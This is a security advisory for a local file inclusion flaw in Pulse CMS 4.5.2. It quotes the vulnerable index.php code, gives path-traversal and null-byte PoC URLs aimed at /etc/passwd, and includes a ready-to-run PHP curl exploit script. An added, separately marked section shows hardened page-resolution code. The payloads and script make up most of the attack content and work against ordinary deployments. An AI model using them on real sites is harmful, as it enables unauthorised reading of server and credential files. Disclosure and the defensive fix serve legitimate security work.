Pulse CMS version 4.5.2 suffers from a local file inclusion vulnerability.
Document Title:
===============
Pulse CMS 4.5.2 - Local File Inclusion
References (Source):
====================
http://ehsansec.ir/advisories/plusecms452-lfi.txt
Release Date:
=============
2016-02-28
Product & Service Introduction:
===============================
Pulse CMS is the easiest way to build and deploy a responsive, content managed website. Since it's a flat file CMS there is no complicated database setup, just copy it to your server and go. (https://www.pulsecms.com/)
Software Link:
==============
http://www.pulsecms.com/download/pulse.zip
Vulnerability Type:
=========================
Local File Inclusion
Vulnerability Details:
==============================
I discovered a local file inclusion vulnerability in Pulse CMS 4.5.2.
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Vulnerable File & Code:
=======================
index.php
$page = (isset($_GET['p']) && !empty($_GET['p'])) ? $_GET['p'] : 'home';
// htmlspecialchars() only encodes quotes and angle brackets; "../", "/" and
// a null byte pass through unchanged, so this is not a path sanitiser.
$page = htmlspecialchars($page, ENT_QUOTES, 'UTF-8');

if (preg_match("/\//", $page)) {
    // a page name containing "/" selects <folder>/home.txt
    if (file_exists("content/pages/" . $page . "home.txt")) {
        $page = $page . "home";
    }
}
// ... lines 17-26 of index.php are not reproduced in the advisory ...
include("content/pages/$page.txt");   // user-controlled $page reaches include()
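A hardened form of the page-resolution code above, as an added example that is not part of the advisory or of Pulse CMS: it keeps the folder/home shortcut the original implements, but replaces htmlspecialchars() with an allow-list on the page name plus a realpath() containment check, so neither "../" nor an embedded null byte can reach include(), whatever the PHP version. The function resolve_page() and the constant PAGES_DIR are names assumed for this illustration.

```php
<?php
// Added example: hardened page resolution for Pulse CMS's index.php.
// Not Pulse CMS code; resolve_page() and PAGES_DIR are names assumed here.

const PAGES_DIR = __DIR__ . '/content/pages';

/**
 * Map the untrusted ?p= value to an absolute file path under PAGES_DIR,
 * or return null when the request must be refused.
 *
 * Control 1: an allow-list. Page names are "segment" or "segment/segment"
 *   where a segment is [A-Za-z0-9_-]+; a trailing "/" selects that folder's
 *   "home" page, as the original code intended. Dots are never allowed, so
 *   "../" cannot appear, and a NUL byte fails the character class. \z (not $)
 *   is used so a trailing newline cannot slip past the anchor.
 * Control 2: realpath() containment, a defence-in-depth check that holds
 *   even if the allow-list is later loosened.
 */
function resolve_page($raw): ?string
{
    if (!is_string($raw) || $raw === '') {
        $raw = 'home';          // also covers ?p[]=... (arrays are not strings)
    }
    if (!preg_match('~^[A-Za-z0-9_-]+(?:/[A-Za-z0-9_-]+)*/?\z~', $raw)) {
        return null;
    }
    $page = (substr($raw, -1) === '/') ? $raw . 'home' : $raw;

    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $page . '.txt');
    if ($base === false || $path === false) {
        return null;            // pages directory or page file does not exist
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;            // resolved outside content/pages (e.g. via a symlink)
    }
    return $path;
}

$path = resolve_page($_GET['p'] ?? null);
if ($path === null) {
    http_response_code(404);
    exit('Page not found');
}
// htmlspecialchars() belongs where the page name is echoed into HTML, not in
// front of include(): output encoding does not constrain a file path.
include $path;
```

With this in place both PoC values above are refused at the allow-list step, before any filesystem call is made.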
Proof of Concept (PoC):
=======================
-- Local File Inclusion --
http://localhost/pluse/index.php?p=../../../../YourPHP.php
-- To include files of other types, use a null byte --
http://localhost/pluse/index.php?p=../../../../etc/passwd%00.php
PHP Exploit
<?php
# Pulse CMS 4.5.2 - Local File Inclusion PoC (target script: index.php)
#   argv[1] : base URL of the Pulse CMS install, with a trailing slash
#   argv[2] : path to include, as in the PoC URLs above
if ($argc < 3) {
    fwrite(STDERR, "Usage: php {$argv[0]} <target-url/> <file>\n");
    exit(1);
}
$target = $argv[1];
$file = $argv[2];
echo "Pulse CMS 4.5.2 - Local File Inclusion\n";
echo "Author : Ehsan Hosseini\n\n\n";
// Request index.php?p=<file>%00.php; the null byte cuts off the ".txt" suffix
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $target.'index.php?p='.$file."%00.php");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
$ex = curl_exec($ch);
if ($ex === false) {
    fwrite(STDERR, 'curl error: '.curl_error($ch)."\n");
}
curl_close($ch);
unset($ch);
echo $ex;
?>
Author:
==================
Ashiyane Digital Security Team
Ehsan Hosseini
http://ehsansec.ir/
Special Thanks To:
==================
Bl4ck_mohajem
Contact:
========
hehsan979@gmail.com
info@ehsansec.ir